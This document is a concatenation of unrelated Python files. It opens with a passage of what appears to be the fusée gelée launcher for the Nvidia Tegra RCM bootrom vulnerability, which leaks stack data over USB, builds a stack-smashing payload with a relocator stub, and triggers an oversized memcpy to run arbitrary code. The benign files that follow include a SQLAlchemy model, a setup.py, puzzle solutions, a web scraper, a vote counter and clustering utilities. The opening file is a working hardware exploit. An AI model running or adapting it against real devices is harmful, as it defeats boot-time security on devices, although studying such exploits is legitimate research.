        return self.COPY_BUFFER_ADDRESSES[self.current_buffer]

    def read_device_id(self):
        """ Reads the Device ID via RCM. Only valid at the start of the communication. """
        return self.read(16)

    def read_stack(self):
        """ Leaks 16 bytes from the device's stack via the EP0 GET_STATUS path. """
        return self.backend.read_ep0(0x10)

    def get_overwrite_length(self):
        """
        Computes (and caches) how many bytes must be copied out of the high
        DMA buffer to reach InnerMemcpy's saved LR on the device stack.
        """
        # overwrite_len = 0x00004f20
        if self.overwrite_len is None:
            stack_snapshot = self.read_stack()
            print("Stack snapshot: {}".format(binascii.hexlify(stack_snapshot)))
            # Per the naming here, the leaked little-endian word at offset 0xC
            # is a pointer into the endpoint-status handler's stack frame.
            self.EndpointStatus_stack_addr = struct.unpack('<I', stack_snapshot[0xC:0xC+4])[0]
            print("EndpointStatus_stack_addr: 0x{:08x}".format(self.EndpointStatus_stack_addr))
            self.ProcessSetupPacket_SP = self.EndpointStatus_stack_addr - 0xC
            print("ProcessSetupPacket SP: 0x{:08x}".format(self.ProcessSetupPacket_SP))
            self.InnerMemcpy_LR_stack_addr = self.ProcessSetupPacket_SP - 2 * 4 - 2 * 4
            print("InnerMemcpy LR stack addr: 0x{:08x}".format(self.InnerMemcpy_LR_stack_addr))
            self.overwrite_len = self.InnerMemcpy_LR_stack_addr - self.COPY_BUFFER_ADDRESSES[1]
            print("overwrite_len: 0x{:08x}".format(self.overwrite_len))
        return self.overwrite_len

    def switch_to_highbuf(self):
        """ Switches to the higher RCM buffer, reducing the amount that needs to be copied. """
        if self.get_current_buffer_address() != self.COPY_BUFFER_ADDRESSES[1]:
            self.write(b'\0' * USB_XFER_MAX)

    def trigger_controlled_memcpy(self, length=None):
        """ Triggers the RCM vulnerability, causing it to make a signficantly-oversized memcpy. """

        # Determine how much we'd need to transmit to smash the full stack.
        if length is None:
            # length = self.STACK_END - self.get_current_buffer_address()
            length = self.get_overwrite_length()
        print("sending status request with length 0x{:08x}".format(length))
        return self.backend.trigger_vulnerability(length)

    def get_overwite_payload_off(self, intermezzo_size):
        # ("overwite" [sic] kept -- callers use this name.)
        # Offset within the user payload at which the stack-smash word lands.
        overwrite_len = self.get_overwrite_length()
        overall_payload_overwrite_len = overwrite_len - (RCM_PAYLOAD_ADDR - self.EndpointStatus_stack_addr)
        overwrite_payload_off = overall_payload_overwrite_len - intermezzo_size - 4
        return overwrite_payload_off

    def get_payload_first_length(self, intermezzo_size, payload_length):
        # Bytes of the user payload that fit before the smash offset.
        overwrite_payload_off = self.get_overwite_payload_off(intermezzo_size)
        print("overwrite_payload_off: 0x{:08x}".format(overwrite_payload_off))
        return min(payload_length, overwrite_payload_off)

    def get_payload_second_length(self, intermezzo_size, payload_length):
        # Remaining payload bytes that must be transmitted after the smash word.
        return max(0, payload_length - self.get_payload_first_length(intermezzo_size, payload_length))

    def get_patched_intermezzo(self, intermezzo_bin, payload_length):
        """
        Patches the four-word parameter block embedded in the intermezzo
        relocator (located via the 0x50004000 magic) with the real start
        address, relocation target, and the two payload split lengths.
        """
        overwrite_len = self.get_overwrite_length()
        intermezzo_start_addr_magic = struct.pack('<I', 0x50004000)
        intermezzo_start_addr_off = intermezzo_bin.find(intermezzo_start_addr_magic)
        intermezzo_start_addr = RCM_PAYLOAD_ADDR
        intermezzo_reloc_addr = self.COPY_BUFFER_ADDRESSES[0]
        payload_first_length = self.get_payload_first_length(len(intermezzo_bin), payload_length)
        print("payload_first_length: 0x{:08x}".format(payload_first_length))
        payload_second_length = self.get_payload_second_length(len(intermezzo_bin), payload_length)
        print("payload_second_length: 0x{:08x}".format(payload_second_length))
        patched_vals = struct.pack('<IIII',
            intermezzo_start_addr, intermezzo_reloc_addr,
            payload_first_length, payload_second_length)
        print(binascii.hexlify(patched_vals))
        patched_intermezzo_bin = intermezzo_bin[:intermezzo_start_addr_off] + patched_vals + intermezzo_bin[intermezzo_start_addr_off + len(patched_vals):]
        return patched_intermezzo_bin
def parse_usb_id(id):
    """ Quick function to parse VID/PID arguments. """
    # USB vendor/product IDs are conventionally written in hexadecimal.
    return int(id, base=16)
# Read our arguments.
parser = argparse.ArgumentParser(description='launcher for the fusee gelee exploit (by @ktemkin)')
parser.add_argument('payload', metavar='payload', type=str, help='ARM payload to be launched; should be linked at 0x40010000')
parser.add_argument('-w', dest='wait', action='store_true', help='wait for an RCM connection if one isn\'t present')
parser.add_argument('-V', metavar='vendor_id', dest='vid', type=parse_usb_id, default=None, help='overrides the TegraRCM vendor ID')
parser.add_argument('-P', metavar='product_id', dest='pid', type=parse_usb_id, default=None, help='overrides the TegraRCM product ID')
parser.add_argument('--override-os', metavar='platform', dest='platform', type=str, default=None, help='overrides the detected OS; for advanced users only')
parser.add_argument('--relocator', metavar='binary', dest='relocator', type=str, default="%s/intermezzo.bin" % os.path.dirname(os.path.abspath(__file__)), help='provides the path to the intermezzo relocation stub')
parser.add_argument('--override-checks', dest='skip_checks', action='store_true', help="don't check for a supported controller; useful if you've patched your EHCI driver")
parser.add_argument('--allow-failed-id', dest='permissive_id', action='store_true', help="continue even if reading the device's ID fails; useful for development but not for end users")
parser.add_argument('--tty', dest='tty_mode', action='store_true', help="Enable TTY mode after payload launch")
arguments = parser.parse_args()
# Expand out the payload path to handle any user references (e.g. "~").
payload_path = os.path.expanduser(arguments.payload)
if not os.path.isfile(payload_path):
    print("Invalid payload path specified!")
    sys.exit(-1)
# Find our intermezzo relocator...
intermezzo_path = os.path.expanduser(arguments.relocator)
if not os.path.isfile(intermezzo_path):
    print("Could not find the intermezzo interposer. Did you build it?")
    sys.exit(-1)
# Get a connection to our device.
try:
    switch = RCMHax(wait_for_device=arguments.wait, vid=arguments.vid,
            pid=arguments.pid, os_override=arguments.platform, override_checks=arguments.skip_checks)
except IOError as e:
    print(e)
    sys.exit(-1)
# Load the first-stage relocator binary from disk.
intermezzo = None
intermezzo_size = None
with open(intermezzo_path, "rb") as f:
    intermezzo = f.read()
    intermezzo_size = len(intermezzo)
    print("intermezzo_size: 0x{:08x}".format(intermezzo_size))
# Load the user's final-stage payload from disk.
target_payload = None
target_payload_size = None
with open(payload_path, "rb") as f:
    target_payload = f.read()
    target_payload_size = len(target_payload)
    print("target_payload_size: 0x{:08x}".format(target_payload_size))
# Print the device's ID. Note that reading the device's ID is necessary to get it into
try:
    device_id = switch.read_device_id()
    # device_id = b'0000'
    print("Found a Tegra with Device ID: {}".format(binascii.hexlify(device_id)))
except OSError as e:
    # Raise the exception only if we're not being permissive about ID reads.
    if not arguments.permissive_id:
        raise e
# Patch the relocator's parameter block, and keep a copy on disk for debugging.
patched_intermezzo = switch.get_patched_intermezzo(intermezzo, target_payload_size)
with open("intermezzo_patched.bin", "wb") as f:
    f.write(patched_intermezzo)
# sys.exit(0)
# Prefix the image with an RCM command, so it winds up loaded into memory
# at the right location (0x40010000).
RCM_HEADER_SIZE = RCM_V1_HEADER_SIZE
# Use the maximum length accepted by RCM, so we can transmit as much payload as
# we want; we'll take over before we get to the end.
length = 0x30000 + RCM_HEADER_SIZE - 0x10
payload = length.to_bytes(4, byteorder='little')
print("Setting rcm msg size to 0x{:08x}".format(length))
print("RCM payload (len_insecure): {}".format(binascii.hexlify(payload)))
# pad out to RCM_HEADER_SIZE so the payload starts at the right address in IRAM
payload += b'\0' * (RCM_HEADER_SIZE - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
print("Payload offset of intermezzo: 0x{:08x}".format(len(payload)))
# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
payload += patched_intermezzo
# First chunk of the user payload: everything that fits before the word that
# overwrites the saved return address.
payload_first_length = switch.get_payload_first_length(intermezzo_size, target_payload_size)
payload += target_payload[:payload_first_length]
overwrite_len = switch.get_overwrite_length()
print("overwrite_len: 0x{:08x}".format(overwrite_len))
payload_overwrite_len = overwrite_len - (RCM_PAYLOAD_ADDR - switch.EndpointStatus_stack_addr)
print("payload_overwrite_len: 0x{:08x}".format(payload_overwrite_len))
overwrite_payload_off = switch.get_overwite_payload_off(intermezzo_size)
print("overwrite_payload_off: 0x{:08x}".format(overwrite_payload_off))
# Pad (if needed) so the smash word lands at exactly the computed offset.
smash_padding = 0
if payload_first_length < overwrite_payload_off:
    smash_padding = overwrite_payload_off - payload_first_length
print("smash_padding: 0x{:08x}".format(smash_padding))
payload += b'\0' * smash_padding
payload += RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little')
# overwrite_payload_off = switch.get_overwite_payload_off(intermezzo_size)
# smash_padding = 0
# if payload_first_length < overwrite_payload_off:
#     smash_padding = overwrite_payload_off - payload_first_length - 0x100
# print("smash_padding: 0x{:08x}".format(smash_padding))
# payload += b'\0' * smash_padding
# payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * 0x4000)
# Any remainder of the user payload goes after the smash word.
payload_second_length = switch.get_payload_second_length(intermezzo_size, target_payload_size)
if payload_second_length > 0:
    payload += target_payload[payload_first_length:]
# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
payload_length = len(payload)
padding_size = USB_XFER_MAX - (payload_length % USB_XFER_MAX)
payload += (b'\0' * padding_size)
# Keep on-disk copies of exactly what we're sending, for debugging.
with open("payload.bin", "wb") as f:
    f.write(payload)
with open("payload_no_header.bin", "wb") as f:
    f.write(payload[RCM_HEADER_SIZE:])
# Check to see if our payload packet will fit inside the RCM high buffer.
# If it won't, error out.
if len(payload) > length:
    size_over = len(payload) - length
    print("ERROR: Payload is too large to be submitted via RCM. ({} bytes larger than max).".format(size_over))
    sys.exit(errno.EFBIG)
# sys.exit(0)
# Send the constructed payload, which contains the command, the stack smashing
# values, the Intermezzo relocation stub, and the final payload.
print("Uploading payload...")
switch.write(payload)
# The RCM backend alternates between two different DMA buffers. Ensure we're
# about to DMA into the higher one, so we have less to copy during our attack.
switch.switch_to_highbuf()
# Smash the device's stack, triggering the vulnerability.
print("Smashing the stack...")
try:
    switch.trigger_controlled_memcpy()
except ValueError as e:
    print(str(e))
except IOError:
    print("The USB device stopped responding-- sure smells like we've smashed its stack. :)")
    print("Launch complete!")
# TTY mode: keep reading from the device and echo anything it sends back.
if arguments.tty_mode:
    while True:
        buf = switch.read(USB_XFER_MAX)
        print(binascii.hexlify(buf))
        try:
            print(buf.decode('utf-8'))
        except UnicodeDecodeError:
            pass
|
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from . import app
from datetime import datetime
# Shared declarative base that the ORM models in this module extend.
Base = declarative_base()
class User(Base):
    """A user together with their alert schedule and escalation settings."""
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    otp_secret = Column(String(100), nullable=False)  # OTP secret (usage not visible in this module)
    alert_type = Column(String(250), nullable=False)
    action = Column(String(250), nullable=False)
    missed_alerts = Column(Integer, nullable=True)
    alert_times = Column(String(250), nullable=False)  # space-separated "HH:MM" entries (see smallest_diff)
    threshold = Column(Integer, nullable=False)
    @property
    def smallest_diff(self):
        """Seconds between now and the closest of today's configured alert times."""
        # Sentinel larger than any possible same-day difference (< 86400 s).
        diff = 100000000
        for t in self.alert_times.split(' '):
            hours, minutes = t.split(':')
            now = datetime.now()
            # Today's occurrence of the configured HH:MM, past or future.
            db_time = now.replace(hour=int(hours), minute=int(minutes), second=0, microsecond=0)
            seconds_diff = abs(db_time - now).total_seconds()
            if seconds_diff < diff:
                diff = seconds_diff
        return diff
    def __str__(self):
        # NOTE: the backslash continuation makes the next line's leading
        # whitespace part of the returned string -- do not re-indent.
        return f'name: {self.name}\nalert_type: {self.alert_type}\naction: {self.action}\n\
            missed_alerts: {self.missed_alerts}\n threshold: {self.threshold}'
def create():
    """Create every table declared on Base in the configured SQLite database."""
    db_url = 'sqlite:///' + app.config['DB_FILE']
    engine = create_engine(db_url)
    Base.metadata.create_all(engine)
|
#!/usr/bin/env python
# -*- coding: utf-8 -
#
# This file is part of restkit released under the MIT license.
# See the NOTICE for more information.
from setuptools import setup, find_packages
import glob
from imp import load_source
import os
import sys
# Refuse to install on interpreters older than Python 2.6.
if not hasattr(sys, 'version_info') or sys.version_info < (2, 6, 0, 'final'):
    raise SystemExit("Restkit requires Python 2.6 or later.")
# Optional/extra setup() keyword arguments (currently unused).
extras = {}
# PyPI trove classifiers describing the project.
CLASSIFIERS = [
    'Development Status :: 4 - Beta',
    'Environment :: Web Environment',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: MIT License',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Topic :: Internet :: WWW/HTTP',
    'Topic :: Software Development :: Libraries']
# Console scripts installed alongside the package.
SCRIPTS = ['scripts/restcli']
def main():
    """Assemble the package metadata and hand it to setuptools."""
    # Pull the version number out of restkit/version.py without importing
    # the package itself.
    version = load_source("version", os.path.join("restkit",
        "version.py"))

    # The long description shown on PyPI is the project README.
    readme_path = os.path.join(os.path.dirname(__file__), 'README.rst')
    with open(readme_path) as f:
        long_description = f.read()

    DATA_FILES = [
        ('restkit', ["LICENSE", "MANIFEST.in", "NOTICE", "README.rst",
                        "THANKS", "TODO.txt"])
        ]

    setup(
        name='restkit',
        version=version.__version__,
        description='Python REST kit',
        long_description=long_description,
        author='Benoit Chesneau',
        author_email='benoitc@e-engura.org',
        license='MIT',
        url='http://benoitc.github.com/restkit',
        classifiers=CLASSIFIERS,
        packages=find_packages(exclude=['tests']),
        data_files=DATA_FILES,
        scripts=SCRIPTS,
        zip_safe=False,
        entry_points={
            'paste.app_factory': [
                'proxy = restkit.contrib.wsgi_proxy:make_proxy',
                'host_proxy = restkit.contrib.wsgi_proxy:make_host_proxy',
                'couchdb_proxy = restkit.contrib.wsgi_proxy:make_couchdb_proxy',
            ]},
        install_requires=[
            'http-parser>=0.8.3',
            'socketpool>=0.5.3'],
        test_suite='nose.collector',
    )


if __name__ == "__main__":
    main()
|
# Bulls and Cows
'''
You are playing the following Bulls and Cows game with your friend:
You write down a number and ask your friend to guess what the number is.
Each time your friend makes a guess, you provide a hint that indicates
how many digits in said guess match your secret number exactly in both
digit and position (called "bulls") and how many digits match the secret
number but locate in the wrong position (called "cows"). Your friend will
use successive guesses and hints to eventually derive the secret number.
Write a function to return a hint according to the secret number and friend's
guess, use A to indicate the bulls and B to indicate the cows.
Please note that both secret number and friend's guess may contain duplicate digits.
Test Cases
1) "1807" "7810" ==> 1A3B
1#07 7#10
2) "1122" "2211" ==> 0A4B
3) "1" "0" ==> 0A0B
4) "1122" "1111" ==> 2A0B
##22 ##11
5) "1123" "0111" ==> 1A1B
1#23 0#11
6) "1111" "1122" ==> 2A0B
##11 ##22
7) "1122" "2210" ==> 0A3B
Bulls:
- same position, same value
Cows:
- Match value but wrong position
'''
##################################################
# Solution 1 #
# 152 / 152 test cases passed. #
# Runtime: 80 ms #
# Memory Usage: 13.8 MB #
##################################################
def getHint(secret: str, guess: str) -> str:
    """Return the Bulls-and-Cows hint for *guess* against *secret*.

    Bulls (the "A" count) are digits that match in both value and position;
    cows (the "B" count) are digits present in the secret but guessed in the
    wrong position.  Duplicate digits are only matched as many times as they
    occur in both strings.
    """
    from collections import Counter

    # Bulls: positions where the two strings agree exactly.
    bulls = sum(s == g for s, g in zip(secret, guess))
    # The multiset intersection counts every value match regardless of
    # position in O(n); subtracting the bulls leaves just the misplaced
    # matches (cows).  This replaces the original O(n*k) list-scan/remove.
    matches = sum((Counter(secret) & Counter(guess)).values())
    cows = matches - bulls
    return str(bulls) + "A" + str(cows) + "B"
##################################################
# Fastest Solution #
# Runtime: 80 ms #
##################################################
class Solution:
    def getHint(self, secret: str, guess: str) -> str:
        """Return the bulls/cows hint string, e.g. "1A3B"."""
        # Positional matches (bulls).
        exact = 0
        for idx in range(len(secret)):
            exact += secret[idx] == guess[idx]
        # Value matches irrespective of position; subtracting the exact
        # matches leaves only the misplaced ones (cows).
        total = sum(min(secret.count(d), guess.count(d)) for d in set(secret))
        return f"{exact}A{total - exact}B"
if __name__ == "__main__":
    # (secret, guess) pairs; the expected hints are, in order:
    # 1A3B, 0A4B, 0A0B, 2A0B, 1A1B, 2A0B
    group = [['1807','7810'],['1122','2211'],['1','0'],['1122','1111'],['1123','0111'],['1111','1122']]
    for a in group:
        print("Secret {}, Guess {}, Hint: {}".format(a[0], a[1], getHint(a[0],a[1])))
from scrapy.item import Field
from scrapy.item import Item
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.loader.processors import MapCompose
from scrapy.linkextractors import LinkExtractor
from scrapy.loader import ItemLoader
class Propiedad(Item):
    # Free-text details scraped from a single property listing page.
    informacion = Field()
# Crawler
class UrbaniaCrawler(CrawlSpider):
    """Crawl grupourbania.com.mx listing pages and yield Propiedad items."""
    name = 'Urbania'
    custom_settings = {
        'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36',
        'CLOSESPIDER_PAGECOUNT': 70
    }
    allowed_domains = ['grupourbania.com.mx']
    start_urls = ['https://www.grupourbania.com.mx/resultados.php?estado=CDMX&delegacion=&colonia=&min_precio=1764560&max_precio=&min_tam=77&recamaras=',
                  'https://www.grupourbania.com.mx/resultados.php?estado=Quer%C3%A9taro&delegacion=&colonia=&min_precio=955000&max_precio=3308216&min_tam=98&recamaras=']
    download_delay = 1
    rules = (
        # Follow every property-detail link found on the result pages.
        Rule(
            LinkExtractor(allow=r'/casas-y-departamentos/'),
            callback='parse_propiedad',
            follow=True
        ),
    )

    def limpia(self, text):
        """Remove tabs, carriage returns and newlines, then trim whitespace."""
        for ch in ("\t", "\r", "\n"):
            text = text.replace(ch, "")
        return text.strip()

    def parse_propiedad(self, response):
        """Load a Propiedad item from a listing detail page."""
        loader = ItemLoader(Propiedad(), response)
        data_xpath = '//div[@class="development-section__data-block"]/div/text()'
        loader.add_xpath('informacion', data_xpath, MapCompose(self.limpia))
        yield loader.load_item()
import os
import csv
from statistics import mean
# Tally votes per candidate from the election data CSV.
csvpath = os.path.join('Resources', 'election_data.csv')
with open(csvpath) as csvfile:
    csvreader = csv.reader(csvfile, delimiter=',')
    csv_header = next(csvreader)  # skip the header row
    total_votes = 0
    votes = {}
    for row in csvreader:
        total_votes += 1
        # row[2] is the candidate name; .get handles first-seen candidates,
        # replacing the separate candidates_with_votes membership list.
        votes[row[2]] = votes.get(row[2], 0) + 1

# Candidates ordered by vote count, highest first.
sorted_votes = sorted(votes.items(), reverse=True, key=lambda item: item[1])

print('Election Results')
print('-------------------------')
print('Total Votes: ' + str(total_votes))
print('-------------------------')
# One loop instead of four hard-coded index lines: works for any number of
# candidates and no longer raises IndexError when there are fewer than four.
for name, count in sorted_votes:
    print(name + ': ' + str(round(100*count/total_votes, 3)) + '% ' + '(' + str(count) + ')')
print('-------------------------')
print('Winner: ' + sorted_votes[0][0])
print('-------------------------')

# Build the summary header/row pairs (same layout as before for 4 candidates).
ordinals = ['First', 'Second', 'Third', 'Fourth', 'Fifth',
            'Sixth', 'Seventh', 'Eighth', 'Ninth', 'Tenth']
header = ['Total Votes']
values = [total_votes]
for i, (name, count) in enumerate(sorted_votes):
    # Fall back to a numeric label if there are more candidates than ordinals.
    label = ordinals[i] if i < len(ordinals) else str(i + 1)
    header += [label, 'Percentage', 'Votes']
    values += [name, str(round(100*count/total_votes, 3)), str(count)]

output_path = os.path.join('Resources', 'poll_results.csv')
# newline='' stops the csv module from writing blank rows on Windows.
with open(output_path, 'w', newline='') as csvfile:
    csvwriter = csv.writer(csvfile, delimiter=',')
    csvwriter.writerow(header)
    csvwriter.writerow(values)
|
# -*- coding: utf-8 -*-
'''
Created on Dec 6th, 2017
@author: Varela
motivation: module provides clustering from distance and transforming (from structs)
'''
#Regex
import glob # Unix style GLOB performs pattern matching on files
import re
#Datascience stuff
import pandas as pd
import numpy as np
#Nice command line
import sys
DATASET_PATH='../../locality-sensitive-hashing/datasets/'
DISTANCE_MATRICES_PATTERN=DATASET_PATH + '*_distance_matrix.txt'
CLUSTER_MODELS_PATTERN=DATASET_PATH + '*_cluster.txt'
def cluster2txt(cluster, filename='distance_cluster.txt'):
    '''
    Write a cluster mapping to a space-separated text file in DATASET_PATH.
    INPUT
        cluster<dict<int,int>>: document id -> cluster id
        filename<string>: name of the file to be generated
    OUTPUT
        (none; a file is written to disk)
    '''
    out_path = DATASET_PATH + filename
    frame = pd.DataFrame.from_dict(cluster, orient='index')
    frame.to_csv(out_path, sep=' ', index=True, index_label=False, header=None)
def clusterize(dist):
    '''
    Group documents whose pairwise distance is numerically zero.
    INPUT
        dist<float<D,D>>: dist numpy matrix
        D<int>: number of original documents
    OUTPUT
        cluster<dict<int,int>>: document id -> cluster id
    '''
    eps = 1e-3  # distances below this are treated as zero
    n_rows, n_cols = dist.shape
    col_index = np.arange(n_cols)
    labels = {}
    next_label = 0
    for row in range(n_rows):
        # A document already labelled was absorbed by an earlier cluster.
        if row in labels:
            continue
        labels[row] = next_label
        # Pull in every later document at (numerically) zero distance.
        near = (dist[:, row] < eps) & (col_index > row)
        for other in col_index[near]:
            labels[other] = next_label
        next_label += 1
    return labels
def distance_matrix_clustering():
    '''
    Generates a cluster file for each dataset file matching the regex
    *_distance_matrix.txt.
    INPUT
        dist<float<D,D>>: Distance matrices @ dataset directory
        D<int>: number of original documents
    OUTPUT
        cluster<int<D,2>>: one *_cluster.txt file per matrix
        D<int>: number of original documents
    '''
    matcher = re.compile('(.*)_distance_matrix.txt$')
    files = glob.glob(DISTANCE_MATRICES_PATTERN)
    print('%d files found matching distance_matrix suffix' % len(files))
    for i, file in enumerate(files):
        print('Fetching %d file...' % (i+1))
        df = pd.read_csv(file, sep=' ', index_col=None, header=None, skiprows=1)
        # DataFrame.as_matrix() was deprecated in pandas 0.23 and removed in
        # 1.0; .values returns the same ndarray on every pandas version.
        dist = df.values
        print('Fetching %d file... done' % (i+1))
        filename = file.split('/')[-1]
        matchings = matcher.match(filename)
        # group(1) is the data-model prefix before '_distance_matrix.txt'.
        data_model = matchings.groups()[0]
        print('Clustering of %s...' % (data_model))
        cluster_filename = data_model + '_cluster.txt'
        cluster = clusterize(dist)
        print('Clustering of %s...done' % (data_model))
        cluster2txt(cluster, filename=cluster_filename)
def cluster_txt2df(str_pattern):
    '''
    Scans dataset for clusters glob matching str_pattern and
    returns all
    INPUT
        str_pattern<str>: Fetches a glob of files that match
    OUTPUT
        df<pandas.DataFrame>: index: observationsid
            column.names: filenames
            values: clusterid
    examples:
        str_pattern= '*_cluster.txt'
        matches: 'gaussian_0.3_cluster.txt', 'sparse_0.4_cluster.txt' but not 'goldenset.csv'
    '''
    # NOTE: the previous unused locals (`matcher` regex, `newnames`) were removed.
    str_pattern1 = DATASET_PATH + str_pattern
    files = glob.glob(str_pattern1)
    M = len(files)
    print('%d files found matching r\'%s\' pattern' % (M, str_pattern))
    # Read each file into a single-column frame, then concatenate once at the
    # end: avoids the quadratic copying of calling pd.concat inside the loop.
    frames = []
    for i, file in enumerate(files):
        colname = get_filename(file)
        print('Fetching %d\t%s...' % (i+1, colname))
        frame = pd.read_csv(file, sep=' ', index_col=0, header=None)
        frame.columns = [colname]
        frames.append(frame)
        print('Fetching %d\t%s...done' % (i+1, colname))
    # Raises ValueError when no file matched (previously an opaque NameError).
    df = pd.concat(frames, axis=1)
    return df
def cluster_dict2set(cluster_dict):
    '''
    Receives a cluster dict and computes a neighbourhood dict
    INPUT
        cluster_dict<int,int>: each value from the cluster dict is an integer
    OUTPUT
        neighbour_dict<int,set<int>>: each value is the set of documents
            sharing that document's cluster
    '''
    # Invert the mapping: cluster id -> list of member documents.
    members = {}
    for doc, label in cluster_dict.items():
        members.setdefault(label, []).append(doc)
    # Each document maps to the full member set of its own cluster.
    return {doc: set(members[label]) for doc, label in cluster_dict.items()}
def cluster_set2pairwise(neighbour_dict):
    '''
    Receives a neighbour dict which is a dict of sets
    INPUT
        neighbour_dict<int,set<int>>: each value is a set of integers of variable size
    OUTPUT
        (set_of_pairs, set_of_uniques): pairs are frozensets of two ids from
        the same cluster; uniques are ids of singleton clusters
    '''
    seen = set()
    pair_rows = []
    singleton_ids = []
    done = 0
    total = len(neighbour_dict)
    for doc_id, neighbours in neighbour_dict.items():
        # Progress line (overwritten in place via carriage return).
        sys.stdout.write('cluster_set2pairwise:%d of %d doc_id:%s \r' % (done, total, str(doc_id)))
        sys.stdout.flush()
        if not (doc_id in seen):
            size = len(neighbours)
            if size == 1:
                singleton_ids += list(neighbours)
            else:
                # Emit every unordered pair within this cluster.
                ordered = list(neighbours)
                for a in range(size - 1):
                    for b in range(a + 1, size):
                        pair_rows.append([ordered[a], ordered[b]])
            # Every member of the cluster is now handled.
            seen = seen.union(set(neighbours))
        done += 1
    return lol2sos(pair_rows), set(singleton_ids)
def lol2sos(list_of_lists):
    '''
    converts a list of lists to a set of frozensets
    INPUT
        list_of_lists<list<list<int>>>: inner lists are unordered pairs
    OUTPUT
        set<frozenset<int>>: duplicates and orderings collapse
    '''
    return {frozenset(item) for item in list_of_lists}
def get_filename(filename):
    '''
    Removes filename's prefix and suffix
    INPUT
        filename<str>: fullname path ('/'-separated)
    OUTPUT
        filename1<str>: basename without its final extension
            (returns '' when the basename has no '.' at all)
    '''
    base = filename.split('/')[-1]
    parts = base.split('.')
    return '.'.join(parts[:-1])
if __name__ == '__main__':
    # CLI entry point: cluster every *_distance_matrix.txt in the dataset dir.
    distance_matrix_clustering()
|
# Build and print a simple greeting.
first_name = "PP"
last_name = "Singh"
# f-string is clearer than str.format for simple interpolation
# (commented-out experiment removed).
output = f"Hello, {first_name} {last_name}"
print(output)
import itertools
import sys
'''
To run:
python palindrome.py <string>
The time complexity is O(N^2): the main loop runs up to N/2 times and each
iteration reverses the list and compares it (O(N)), plus performs O(N)
list deletions/insertions. The loop ends early when we either:
  a) obtain a palindrome before iterating through half the string, or
  b) discover there are two unpaired letters, which means no palindrome
  arrangement exists.
The space complexity is O(N) because we store the string as a list in
order to alter it in place.
'''
def palindrome(string):
    """Rearrange *string* in place into a palindrome, if one exists.

    Returns the rearranged palindrome as a string, or '' when more than
    one character occurs an odd number of times (no palindrome possible).
    NOTE(review): if the loop runs to completion without hitting either
    return, the function falls through and returns None — presumably
    unreachable for well-formed inputs, but worth confirming.
    """
    original = list(string)  # mutable working copy
    half = len(string) // 2 + 1  # only the first half needs pairing
    unpaired = 0  # characters moved to the middle (odd occurrence count)
    i = 0
    while i < half:
        # check if string is a palindrome
        reverse = original[::-1]
        if reverse == original:
            return ''.join(original)
        # if there are more than two single letters, it is not
        # a palindrome
        if unpaired > 1:
            return ''
        char = original[i]
        # get substring that is behind 'char'
        if i == 0:
            sub = original[i+1:]
        else:
            sub = original[i+1:-i]  # exclude the already-paired tail
        # if 'char' is also found in substring, then move 'char'
        # in substring to the end.
        if sub.count(char) > 0:
            pos = sub.index(char) + i + 1  # index of the partner in 'original'
            del original[pos]
            if i == 0:
                original.append(char)
            else:
                original.insert(-i, char)
            i += 1
        # if there is only one 'char', move 'char' to middle
        else:
            original.insert(half, char)
            del original[i]
            unpaired += 1
# CLI entry point: exactly one argument (the candidate string) is required.
if len(sys.argv) != 2:
    # Wrong argument count: print usage instead of raising IndexError.
    usage = 'python palindrome.py <string>'
    print(usage)
else:
    print(palindrome(sys.argv[1]))
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .request_query_clause_base import RequestQueryClauseBase
class RequestQueryClauseBlock(RequestQueryClauseBase):
    """Defines a list of QueryClauseBase objects that should all match. Nested
    QueryClauseBlock within QueryClauseBlock is not allowed.

    All required parameters must be populated in order to send to Azure.

    NOTE: autogenerated by AutoRest (see file header) — manual edits will be
    lost on regeneration; change the generator inputs instead.

    :param _type: Required. Constant filled by server.
    :type _type: str
    :param values: A list of queryclausebase conditions to be applied.
    :type values:
     list[~microsoft.bing.commerce.search.models.RequestQueryClauseBase]
    """
    # msrest validation map: _type must always be present on the wire.
    _validation = {
        '_type': {'required': True},
    }
    # Maps Python attribute names to wire-format keys/types for msrest
    # (de)serialization.
    _attribute_map = {
        '_type': {'key': '_type', 'type': 'str'},
        'values': {'key': 'values', 'type': '[RequestQueryClauseBase]'},
    }
    def __init__(self, **kwargs):
        super(RequestQueryClauseBlock, self).__init__(**kwargs)
        self.values = kwargs.get('values', None)
        # Polymorphic discriminator consumed by the service.
        self._type = 'QueryClauseBlock'
|
# fields CFHTLenS W1-4
# subfields: 171 1deg^2 throughout W1-4
# cells: 4x4arcmin covering each subfield, in a grid
# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit
import numpy as np
import sys
import os
from os import system
#import scipy
#from scipy import special
#from astropy.io import fits
#from astropy.wcs import WCS
#from astropy import units as u
#from astropy.coordinates import SkyCoord
#from astropy.io import ascii
#from astropy.table import Table, Column
import time
import matplotlib.pyplot as plt
#from numpy.random import normal
from scipy.stats.kde import gaussian_kde
from numpy import linspace
# Echo the command-line configuration back to the user.
# argv: [1]=lens name, [2]=orig|samp|tab, [3]=bin count, [4]=cell radius, [5]=mag limit
